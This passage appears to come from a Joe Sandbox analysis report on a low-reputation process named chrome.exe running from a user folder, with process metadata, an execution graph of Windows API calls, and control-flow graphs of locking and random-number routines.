                                                  MD5 hash:DD36EA28C576FB0AD109B42D3D6C9F96
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:13:16:13
                                                  Start date:23/08/2024
                                                  Path:C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Imagebase:0xd30000
                                                  File size:2'252'904 bytes
                                                  MD5 hash:DD36EA28C576FB0AD109B42D3D6C9F96
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:8
                                                  Start time:13:16:14
                                                  Start date:23/08/2024
                                                  Path:C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Imagebase:0xc40000
                                                  File size:2'252'904 bytes
                                                  MD5 hash:DD36EA28C576FB0AD109B42D3D6C9F96
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Reputation:low
                                                  Has exited:false

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:0.7%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:13.3%
                                                    Total number of Nodes:368
                                                    Total number of Limit Nodes:19
                                                    execution_graph 38333 e00ee0 InitializeConditionVariable 38420 d331d0 228 API calls 3 library calls 38421 d3b3d0 42 API calls __floor_pentium4 38422 d365d0 36 API calls 38335 d486d0 116 API calls __floor_pentium4 38423 d4f9d0 113 API calls __floor_pentium4 38336 d53cd0 TlsAlloc 38337 e6e4e0 OpenProcess GetCurrentProcess 38339 d40aac 222 API calls __floor_pentium4 38424 d31dc0 132 API calls __floor_pentium4 38342 e798f0 304 API calls __floor_pentium4 38345 e236c0 GetCurrentProcess 38429 d407f6 11 API calls 38346 d350f0 40 API calls 38348 d31cf0 9 API calls __floor_pentium4 38430 d3e3f0 95 API calls __floor_pentium4 38349 d664f0 86 API calls _strlen 38350 e7e8c0 VirtualAlloc GetLastError 38432 d4a999 38 API calls __floor_pentium4 38351 d848f0 GetModuleHandleW GetProcAddress 38352 d4a999 14 API calls __floor_pentium4 38066 d369e0 38067 d36a0f 38066->38067 38071 d369f5 38066->38071 38068 d369fa VirtualAlloc 38067->38068 38067->38071 38072 d36a4d VirtualFree 38067->38072 38069 d36a22 GetLastError 38068->38069 38070 d36a0c 38068->38070 38069->38071 38071->38068 38071->38070 38075 e74680 96 API calls __floor_pentium4 38071->38075 38072->38070 38073 d36a5e GetLastError 38072->38073 38073->38070 38075->38071 38353 d3b0e0 10 API calls __floor_pentium4 38433 d397e0 99 API calls 38355 d484e0 124 API calls __floor_pentium4 38434 d541e0 227 API calls __floor_pentium4 38356 d810e0 106 API calls 38358 d47ce9 RaiseException EnterCriticalSection LeaveCriticalSection 38436 d3d390 24 API calls __floor_pentium4 38360 d53c90 RtlCaptureStackBackTrace 38438 d50990 43 API calls __floor_pentium4 38439 e7e7a0 224 API calls 38440 d4a993 6 API calls __floor_pentium4 38442 d4d59b 46 API calls 38443 d3cb80 74 API calls 38364 d4ca80 98 API calls __floor_pentium4 38444 d42780 9 API calls 38365 d53880 23 API calls 38446 e931b0 8 API calls __floor_pentium4 38367 d3f6b0 110 API calls __floor_pentium4 38368 d38cb0 109 API calls __floor_pentium4 38448 d365b0 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 38450 d539b0 264 API calls 38370 e7d080 96 API calls __floor_pentium4 38451 e7c780 58 API calls __floor_pentium4 38274 e35e8d 38277 e35fc2 38274->38277 38278 e36001 38277->38278 38279 e35fef 38277->38279 38290 e3615c 38278->38290 38298 e29935 GetModuleHandleW 38279->38298 38283 e35ff4 38283->38278 38299 e35ef6 GetModuleHandleExW GetProcAddress FreeLibrary 38283->38299 38284 e3604b 38300 e35f91 11 API calls 38284->38300 38285 e35e9e 38288 e36000 38288->38278 38291 e36168 ___std_exception_copy 38290->38291 38301 e44431 EnterCriticalSection 38291->38301 38293 e36172 38302 e36059 38293->38302 38295 e3617f 38306 e3619d LeaveCriticalSection ___std_exception_copy 38295->38306 38297 e36038 38297->38284 38297->38285 38298->38283 38299->38288 38301->38293 38303 e36065 ___std_exception_copy 38302->38303 38305 e360c9 38303->38305 38307 e380f4 17 API calls __EH_prolog3 38303->38307 38305->38295 38306->38297 38307->38305 38452 dfb7b0 223 API calls 2 library calls 38453 d363a1 20 API calls 38456 d4e5ac 240 API calls 2 library calls 38457 dbe5a0 241 API calls 38374 d4dc46 TryAcquireSRWLockExclusive AcquireSRWLockExclusive ReleaseSRWLockExclusive 38375 d3f050 220 API calls __floor_pentium4 38376 d32c50 17 API calls __floor_pentium4 38459 d4ab50 115 API calls 2 library calls 38076 e28164 38081 e434ca GetLastError 38076->38081 38078 e2816f 38131 e43aae 38078->38131 38082 e434e0 38081->38082 38083 e434e6 38081->38083 38135 e43d14 6 API calls __dosmaperr 38082->38135 38109 e434ea SetLastError 38083->38109 38136 e43d53 38083->38136 38090 e4357f 38150 e3a92a 46 API calls ___std_exception_copy 38090->38150 38091 e4357a 38091->38078 38092 e43530 38096 e43d53 __dosmaperr 6 API calls 38092->38096 38093 e4351f 38095 e43d53 __dosmaperr 6 API calls 38093->38095 38098 e4352d 38095->38098 38099 e4353c 38096->38099 38097 e43584 38100 e43596 38097->38100 38151 e43d14 6 API calls __dosmaperr 38097->38151 38145 e13f40 38098->38145 38102 e43557 38099->38102 38103 e43540 38099->38103 38101 e43d53 __dosmaperr 6 API calls 38100->38101 38128 e4359c 38100->38128 38107 e435b0 38101->38107 38149 e437dc 17 API calls __dosmaperr 38102->38149 38108 e43d53 __dosmaperr 6 API calls 38103->38108 38112 e24570 __dosmaperr 2 API calls 38107->38112 38107->38128 38108->38098 38109->38090 38109->38091 38110 e43562 38111 e13f40 __freea 15 API calls 38110->38111 38111->38109 38114 e435c0 38112->38114 38116 e435dd 38114->38116 38117 e435c8 38114->38117 38115 e4361a 38118 e43d53 __dosmaperr 6 API calls 38116->38118 38119 e43d53 __dosmaperr 6 API calls 38117->38119 38120 e435e9 38118->38120 38121 e435d4 38119->38121 38122 e435fc 38120->38122 38123 e435ed 38120->38123 38126 e13f40 __freea 15 API calls 38121->38126 38152 e437dc 17 API calls __dosmaperr 38122->38152 38124 e43d53 __dosmaperr 6 API calls 38123->38124 38124->38121 38126->38128 38127 e43607 38129 e13f40 __freea 15 API calls 38127->38129 38130 e435a1 38128->38130 38153 e3a92a 46 API calls ___std_exception_copy 38128->38153 38129->38130 38130->38078 38132 e43ac1 38131->38132 38134 e2817f 38131->38134 38132->38134 38181 e47446 38132->38181 38135->38083 38154 e44149 38136->38154 38139 e43d8d TlsSetValue 38140 e43502 38140->38109 38141 e24570 38140->38141 38144 e2457c 38141->38144 38142 e2459c 38142->38092 38142->38093 38144->38142 38162 e7ccf0 EnterCriticalSection LeaveCriticalSection ___std_exception_copy 38144->38162 38146 e13f53 38145->38146 38163 db9fa0 38146->38163 38147 e13f5d 38147->38109 38149->38110 38150->38097 38151->38100 38152->38127 38153->38115 38155 e43d6f 38154->38155 38156 e44179 38154->38156 38155->38139 38155->38140 38156->38155 38161 e4407e LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary ___vcrt_FlsGetValue 38156->38161 38158 e4418d 38158->38155 38159 e44193 GetProcAddress 38158->38159 38159->38155 38160 e441a3 __dosmaperr 38159->38160 38160->38155 38161->38158 38162->38144 38164 db9fb2 38163->38164 38167 dba103 38163->38167 38165 dba162 TryAcquireSRWLockExclusive 38164->38165 38164->38167 38171 dba121 38164->38171 38173 dba0be 38164->38173 38166 dba24a 38165->38166 38170 dba17f 38165->38170 38179 dbcf90 TryAcquireSRWLockExclusive AcquireSRWLockExclusive 38166->38179 38167->38147 38169 dba27f 38170->38169 38172 dba1e0 ReleaseSRWLockExclusive 38170->38172 38171->38165 38172->38167 38174 dba1f9 38173->38174 38175 dba0f7 38173->38175 38178 dba770 11 API calls __floor_pentium4 38174->38178 38175->38167 38180 dbae00 9 API calls __floor_pentium4 38175->38180 38178->38167 38179->38170 38180->38167 38182 e47452 ___std_exception_copy 38181->38182 38183 e434ca 46 API calls 38182->38183 38184 e4745b 38183->38184 38191 e474a1 38184->38191 38194 e44431 EnterCriticalSection 38184->38194 38186 e47479 38195 e474c7 38186->38195 38190 e4749d 38190->38191 38200 e3a92a 46 API calls ___std_exception_copy 38190->38200 38191->38134 38193 e474c6 38194->38186 38196 e474d5 __dosmaperr 38195->38196 38198 e4748a 38195->38198 38196->38198 38201 e4727b 38196->38201 38199 e474a6 LeaveCriticalSection ___std_exception_copy 38198->38199 38199->38190 38200->38193 38202 e472fb 38201->38202 38205 e47291 38201->38205 38203 e47349 38202->38203 38206 e13f40 __freea 15 API calls 38202->38206 38229 e47415 38203->38229 38205->38202 38207 e472c4 38205->38207 38212 e13f40 __freea 15 API calls 38205->38212 38208 e4731d 38206->38208 38209 e472e6 38207->38209 38217 e13f40 __freea 15 API calls 38207->38217 38210 e13f40 __freea 15 API calls 38208->38210 38211 e13f40 __freea 15 API calls 38209->38211 38213 e47330 38210->38213 38214 e472f0 38211->38214 38216 e472b9 38212->38216 38218 e13f40 __freea 15 API calls 38213->38218 38219 e13f40 __freea 15 API calls 38214->38219 38215 e473b7 38220 e13f40 __freea 15 API calls 38215->38220 38235 e46701 15 API calls __freea 38216->38235 38222 e472db 38217->38222 38223 e4733e 38218->38223 38219->38202 38224 e473bd 38220->38224 38236 e46a1d 15 API calls __freea 38222->38236 38227 e13f40 __freea 15 API calls 38223->38227 38224->38198 38225 e47357 38225->38215 38228 e13f40 15 API calls __freea 38225->38228 38227->38203 38228->38225 38230 e47441 38229->38230 38231 e47422 38229->38231 38230->38225 38231->38230 38237 e46b0b 15 API calls 2 library calls 38231->38237 38233 e4743b 38234 e13f40 __freea 15 API calls 38233->38234 38234->38230 38235->38207 38236->38209 38237->38233 38377 d47e5c 119 API calls 38238 db7f50 38241 db7f80 38238->38241 38242 db7ff1 38241->38242 38243 db7f64 38241->38243 38255 e282c8 AcquireSRWLockExclusive 38242->38255 38245 db7ffb 38245->38243 38246 db8024 38245->38246 38247 e282c8 3 API calls 38245->38247 38260 e287c8 17 API calls 38246->38260 38251 db8062 38247->38251 38249 db8043 38261 e28317 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 38249->38261 38251->38246 38262 e287c8 17 API calls 38251->38262 38253 db8098 38263 e28317 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 38253->38263 38257 e282dc 38255->38257 38256 e282e1 ReleaseSRWLockExclusive 38256->38245 38257->38256 38264 e28e3e SleepConditionVariableSRW 38257->38264 38260->38249 38261->38243 38262->38253 38263->38246 38264->38257 38265 d40a58 ConvertThreadToFiberEx 38266 d410ed GetLastError 38265->38266 38267 d40a6a CreateFiberEx 38265->38267 38269 d410fe 38266->38269 38267->38266 38268 d40a93 SwitchToFiber DeleteFiber ConvertFiberToThread 38267->38268 38270 d40aac 38268->38270 38273 e29b55 5 API calls ___raise_securityfailure 38270->38273 38272 d40ab9 38273->38272 38378 d4e25a 221 API calls 38381 d33840 226 API calls __floor_pentium4 38461 d32d40 15 API calls __floor_pentium4 38383 d44240 15 API calls __floor_pentium4 38462 d4bb40 55 API calls __floor_pentium4 38384 d50040 15 API calls __freea 38463 d33f44 ReleaseSRWLockExclusive QueryPerformanceCounter __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38385 e89a70 228 API calls 2 library calls 38386 dbe240 TryAcquireSRWLockExclusive AcquireSRWLockExclusive TryAcquireSRWLockExclusive ReleaseSRWLockExclusive 38387 d4e24a 17 API calls 37979 d36a70 37985 d36ad0 TryAcquireSRWLockExclusive 37979->37985 37982 d36a85 37983 d36a9e GetCurrentProcess IsWow64Process 37984 d36ab4 37983->37984 37984->37982 37986 d36bdb 37985->37986 37987 d36afa 37985->37987 38010 dbcf90 TryAcquireSRWLockExclusive AcquireSRWLockExclusive 37986->38010 37995 d36b07 ReleaseSRWLockExclusive 37987->37995 37996 d39990 37987->37996 37992 d36ba8 37994 d39990 220 API calls 37992->37994 37993 d36a79 37993->37982 37993->37983 37994->37995 38009 e29b55 5 API calls ___raise_securityfailure 37995->38009 37997 d399b7 LoadLibraryW 37996->37997 37999 d3999f 37996->37999 37998 d399c6 GetProcAddress 37997->37998 37997->37999 37998->37999 38000 d399dd 37998->38000 38004 d399b3 37999->38004 38011 e01960 220 API calls 37999->38011 38000->37999 38002 d39a38 38003 d39a98 38002->38003 38012 e0b380 RaiseException EnterCriticalSection LeaveCriticalSection 38002->38012 38004->37992 38006 d39a75 38013 e29b55 5 API calls ___raise_securityfailure 38006->38013 38008 d39a90 38008->37992 38009->37993 38010->37987 38011->38002 38012->38006 38013->38008 38389 d3f470 7 API calls 38467 d49970 8 API calls 38391 d53e70 14 API calls __floor_pentium4 38468 e3c54b EnterCriticalSection ___std_exception_copy 38394 ec145c 14 API calls ___delayLoadHelper2@8 38395 e34a51 36 API calls 2 library calls 38470 d3bd60 9 API calls __floor_pentium4 38471 d50760 41 API calls 38474 d33fc8 ReleaseSRWLockExclusive 38014 d3dc10 38019 d3dc60 38014->38019 38018 d3dc54 38020 d3dca8 ___std_exception_copy 38019->38020 38026 df6d80 TryAcquireSRWLockExclusive 38020->38026 38022 d3dd51 38059 e29b55 5 API calls ___raise_securityfailure 38022->38059 38024 d3dc4a 38025 e29b55 5 API calls ___raise_securityfailure 38024->38025 38025->38018 38027 df73c5 38026->38027 38028 df6db6 38026->38028 38062 dbcf90 TryAcquireSRWLockExclusive AcquireSRWLockExclusive 38027->38062 38029 df73f3 ReleaseSRWLockExclusive 38028->38029 38038 df6dc3 38028->38038 38032 df7379 38029->38032 38031 df73d2 38031->38022 38061 e29b55 5 API calls ___raise_securityfailure 38032->38061 38034 df7387 38034->38022 38035 d39990 214 API calls 38036 df6f07 38035->38036 38037 d39990 214 API calls 38036->38037 38039 df6f2a 38037->38039 38038->38035 38040 df6e56 __aulldiv 38038->38040 38052 df7404 38039->38052 38060 d3d550 220 API calls __floor_pentium4 38039->38060 38040->38027 38042 df72e0 TryAcquireSRWLockExclusive 38040->38042 38044 df732d 38042->38044 38045 df73d7 38042->38045 38048 df733a ReleaseSRWLockExclusive 38044->38048 38051 df739a TlsAlloc 38044->38051 38044->38052 38063 dbcf90 TryAcquireSRWLockExclusive AcquireSRWLockExclusive 38045->38063 38046 df6f6c 38046->38040 38058 df741f 38046->38058 38049 df7357 ReleaseSRWLockExclusive 38048->38049 38050 df73e6 38048->38050 38049->38032 38064 d9a660 TryAcquireSRWLockExclusive ReleaseSRWLockExclusive TlsAlloc TryAcquireSRWLockExclusive AcquireSRWLockExclusive 38050->38064 38051->38052 38055 df73a5 38051->38055 38052->38022 38055->38048 38056 df73ee 38056->38049 38057 df744c 38058->38057 38065 d3d4b0 220 API calls __floor_pentium4 38058->38065 38059->38024 38060->38046 38061->38034 38062->38031 38063->38044 38064->38056 38065->38057 38476 d3b510 124 API calls __floor_pentium4 38478 d48910 240 API calls __floor_pentium4 38400 d31000 5 API calls __floor_pentium4 38401 d39800 37 API calls 38484 d3af00 61 API calls __dosmaperr 38403 d48c00 262 API calls __floor_pentium4 38405 d40a02 SwitchToFiber 38406 dbb000 TryAcquireSRWLockExclusive ReleaseSRWLockExclusive TryAcquireSRWLockExclusive AcquireSRWLockExclusive 38485 d37b0d 37 API calls 38408 e2a200 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 38409 d38030 251 API calls 2 library calls 38410 d3e230 70 API calls __floor_pentium4 38411 d3c430 9 API calls __floor_pentium4 38413 d36e34 234 API calls 38492 d3633c 23 API calls 38414 e28613 GetSystemTimeAsFileTime __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38417 d32e20 57 API calls 2 library calls 38493 d48320 122 API calls __floor_pentium4 38494 d4fb20 77 API calls 38418 d51a20 227 API calls __floor_pentium4 38496 d40aac 476 API calls 2 library calls 38497 d53d20 10 API calls __floor_pentium4 38498 d6e120 231 API calls __floor_pentium4 38308 e4361b GetLastError 38309 e43631 38308->38309 38310 e43637 38308->38310 38331 e43d14 6 API calls __dosmaperr 38309->38331 38312 e43d53 __dosmaperr 6 API calls 38310->38312 38314 e4363b SetLastError 38310->38314 38313 e43653 38312->38313 38313->38314 38316 e24570 __dosmaperr 2 API calls 38313->38316 38317 e43668 38316->38317 38318 e43670 38317->38318 38319 e43681 38317->38319 38321 e43d53 __dosmaperr 6 API calls 38318->38321 38320 e43d53 __dosmaperr 6 API calls 38319->38320 38323 e4368d 38320->38323 38322 e4367e 38321->38322 38327 e13f40 __freea 15 API calls 38322->38327 38324 e43691 38323->38324 38325 e436a8 38323->38325 38326 e43d53 __dosmaperr 6 API calls 38324->38326 38332 e437dc 17 API calls __dosmaperr 38325->38332 38326->38322 38327->38314 38329 e436b3 38330 e13f40 __freea 15 API calls 38329->38330 38330->38314 38331->38310 38332->38329

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 df6d80-df6db0 TryAcquireSRWLockExclusive 1 df73cb-df73d2 call dbcf90 0->1 2 df6db6-df6dbd 0->2 3 df73f3-df73ff ReleaseSRWLockExclusive 2->3 4 df6dc3-df6dd6 2->4 7 df7379-df738e call e29b55 3->7 8 df6dd8-df6e00 call dbe010 * 2 4->8 9 df6e33-df6e54 4->9 23 df6e05-df6e2e call dbe010 * 2 8->23 10 df6eb9-df6f56 call d39990 * 2 9->10 11 df6e56-df6e5d 9->11 31 df6f5c-df6f80 call d3d550 call e0aea0 10->31 32 df740a-df7411 10->32 14 df73c8-df73c9 11->14 15 df6e63-df6e74 11->15 14->1 20 df6e7a-df6eb4 15->20 21 df6fc5-df6fd0 15->21 24 df727f-df72c9 call e460b0 20->24 21->20 23->9 34 df72cf-df72d5 24->34 35 df6fd5-df7262 24->35 49 df6f83-df6f88 31->49 39 df72db-df72de 34->39 40 df73c5-df73c6 34->40 38 df7265-df727d 35->38 38->24 42 df72e0-df72e7 38->42 39->38 40->14 43 df72e9-df72eb 42->43 44 df7312-df7327 TryAcquireSRWLockExclusive 42->44 46 df72f3-df7310 43->46 47 df732d-df7338 44->47 48 df73d7-df73e1 call dbcf90 44->48 46->44 46->46 51 df733a-df7351 ReleaseSRWLockExclusive 47->51 52 df7391-df7398 47->52 48->47 53 df6f8e-df6f9b 49->53 54 df7416-df7419 49->54 56 df7357-df7371 ReleaseSRWLockExclusive 51->56 57 df73e6-df73ee call d9a660 51->57 60 df739a-df73a3 TlsAlloc 52->60 61 df7404-df7405 52->61 58 df7447-df7456 call d3d4b0 call d56150 53->58 59 df6fa1-df6fb0 53->59 54->49 62 df741f-df742e call e54060 54->62 56->7 57->56 72 df745e-df7461 58->72 65 df6fb6-df6fbf 59->65 66 df7433-df7435 59->66 67 df7407-df7408 60->67 68 df73a5-df73c0 60->68 61->67 62->66 65->20 65->21 66->72 73 df7437-df743b 66->73 67->32 68->51 73->58
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32 ref: 00DF6DA5
                                                    • __aulldiv.LIBCMT ref: 00DF729D
                                                    • TryAcquireSRWLockExclusive.KERNEL32 ref: 00DF7319
                                                    • ReleaseSRWLockExclusive.KERNEL32 ref: 00DF7341
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DF7366
                                                    • TlsAlloc.KERNEL32 ref: 00DF739A
                                                      • Part of subcall function 00D39990: LoadLibraryW.KERNELBASE(bcryptprimitives.dll,00000000,?,?,00DF6F07,?,?,?), ref: 00D399BC
                                                      • Part of subcall function 00D39990: GetProcAddress.KERNEL32(00000000,ProcessPrng), ref: 00D399CC
                                                      • Part of subcall function 00DBCF90: TryAcquireSRWLockExclusive.KERNEL32(00000040,00000000,00000040,00000000,?,00DF73D2), ref: 00DBCFA1
                                                      • Part of subcall function 00DBCF90: AcquireSRWLockExclusive.KERNEL32(00000040,?,00DF73D2), ref: 00DBCFDA
                                                      • Part of subcall function 00D9A660: TryAcquireSRWLockExclusive.KERNEL32(00EF10F0), ref: 00D9A694
                                                      • Part of subcall function 00D9A660: ReleaseSRWLockExclusive.KERNEL32(00EF10F0), ref: 00D9A6B0
                                                    • ReleaseSRWLockExclusive.KERNEL32 ref: 00DF73F6
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00DF741F
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$Acquire$Release$AddressAllocLibraryLoadProc__aulldiv
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at
                                                    • API String ID: 1366307475-4189810390
                                                    • Opcode ID: 2350d93eea145d90b5365f01fa799fab8a49e8b2a0741044c0bad553afc86ac4
                                                    • Instruction ID: 37b1b6cdbaf54951f246a3cb17bb3ffccb947beb4292149d9bb50b85a27bdda6
                                                    • Opcode Fuzzy Hash: 2350d93eea145d90b5365f01fa799fab8a49e8b2a0741044c0bad553afc86ac4
                                                    • Instruction Fuzzy Hash: 93029171904B848ED312DF398444356FBE2FF95340F04CB2EE9DA67251DB74989A8B52

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 76 dba770-dba795 77 dba79b-dba7b3 call dbabb0 76->77 78 dba966-dba978 call e29b55 76->78 83 dba7b9-dba7c5 77->83 84 dba990-dba9af TryAcquireSRWLockExclusive 77->84 87 dba7fe-dba802 83->87 88 dba7c7-dba7c8 83->88 85 dbaab2-dbaab9 call dbcf90 84->85 86 dba9b5-dba9bb 84->86 94 dbaabe 85->94 89 dbaa8c-dbaa90 86->89 90 dba9c1 86->90 93 dba808-dba812 87->93 87->94 91 dba7d0-dba7d4 88->91 101 dba9d0-dba9da 89->101 102 dbaa96-dbaa98 89->102 95 dba97b-dba98e ReleaseSRWLockExclusive 90->95 96 dba7da-dba7e4 91->96 97 dbaac5 91->97 99 dba818-dba81e 93->99 100 dbab51-dbab86 call e76310 call d369d0 93->100 94->97 103 dba94c-dba964 95->103 96->100 106 dba7ea-dba7f0 96->106 117 dbaacc-dbaacd 97->117 99->100 107 dba824-dba83d TryAcquireSRWLockExclusive 99->107 138 dbab89-dbab93 call e76310 100->138 104 dbaad2-dbab0a call e76310 call d369d0 101->104 105 dba9e0-dba9e6 101->105 109 dba9ef-dbaa37 102->109 103->78 104->138 105->104 111 dba9ec 105->111 106->100 112 dba7f6-dba7fc 106->112 115 dba843-dba849 107->115 116 dbaaa6-dbaaad call dbcf90 107->116 113 dbaa3d-dbaa5b 109->113 114 dbaba4-dbaba5 109->114 111->109 112->87 112->91 121 dbaba7-dbabaa 113->121 122 dbaa61-dbaa7c 113->122 114->121 123 dba918-dba91c 115->123 124 dba84f 115->124 116->85 125 dbaacf-dbaad0 117->125 132 dbaa7e-dbaa80 122->132 133 dbaa9d-dbaaa4 call dba2d0 122->133 130 dba922-dba924 123->130 131 dba860-dba86a 123->131 134 dba932-dba949 ReleaseSRWLockExclusive 124->134 125->104 140 dba87f-dba8c7 130->140 135 dbab0c-dbab4f call e76310 call d369d0 call e76310 131->135 136 dba870-dba876 131->136 132->133 141 dbaa82-dbaa86 132->141 133->141 134->103 150 dbab94-dbab9f call d369d0 call e7e760 135->150 136->135 142 dba87c 136->142 138->150 140->125 145 dba8cd-dba8eb 140->145 141->89 141->95 142->140 145->117 148 dba8f1-dba90c 145->148 151 dba929-dba930 call dba2d0 148->151 152 dba90e-dba910 148->152 150->114 155 dba912-dba916 151->155 152->151 152->155 155->123 155->134
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DBA835
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DBA936
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DBA97F
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DBA9A7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: first$second
                                                    • API String ID: 17069307-3095674784
                                                    • Opcode ID: 187092aad5f17a447f65f63f90be93aab932ffcc48bbffc4c0b54f9d1ce3ac37
                                                    • Instruction ID: f7562939792ac87dcb132c1e5e060272ff64aaa07b654bd5edaad34c34c9f658
                                                    • Opcode Fuzzy Hash: 187092aad5f17a447f65f63f90be93aab932ffcc48bbffc4c0b54f9d1ce3ac37
                                                    • Instruction Fuzzy Hash: 3EB12331A00701DFC7148F29C5406AAB7E2EFD4310B29C669F89A9B295D731DC42DBA2

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 213 d39990-d3999d 214 d399b7-d399c4 LoadLibraryW 213->214 215 d3999f-d399b1 213->215 216 d399e3-d39a5b call e01960 214->216 217 d399c6-d399db GetProcAddress 214->217 221 d399e0-d399e1 215->221 226 d399b3-d399b6 215->226 224 d39a98-d39a99 216->224 225 d39a5d-d39a67 216->225 217->215 219 d399dd-d399de 217->219 219->221 221->216 227 d39a9b-d39a9f 224->227 225->227 228 d39a69-d39a79 call e0b380 225->228 231 d39a86-d39a97 call e29b55 228->231 232 d39a7b-d39a83 call e26a9b 228->232 232->231
                                                    APIs
                                                    • LoadLibraryW.KERNELBASE(bcryptprimitives.dll,00000000,?,?,00DF6F07,?,?,?), ref: 00D399BC
                                                    • GetProcAddress.KERNEL32(00000000,ProcessPrng), ref: 00D399CC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: ProcessPrng$bcryptprimitives.dll
                                                    • API String ID: 2574300362-2667675608
                                                    • Opcode ID: f14f3843dd05a5161a2dceedddc51dcf0a1cab14cd6e4646435bb06f5836003c
                                                    • Instruction ID: 108d5d79ca6f2b095b9eb237ff9a409606a4836713bb004a3add18459712007a
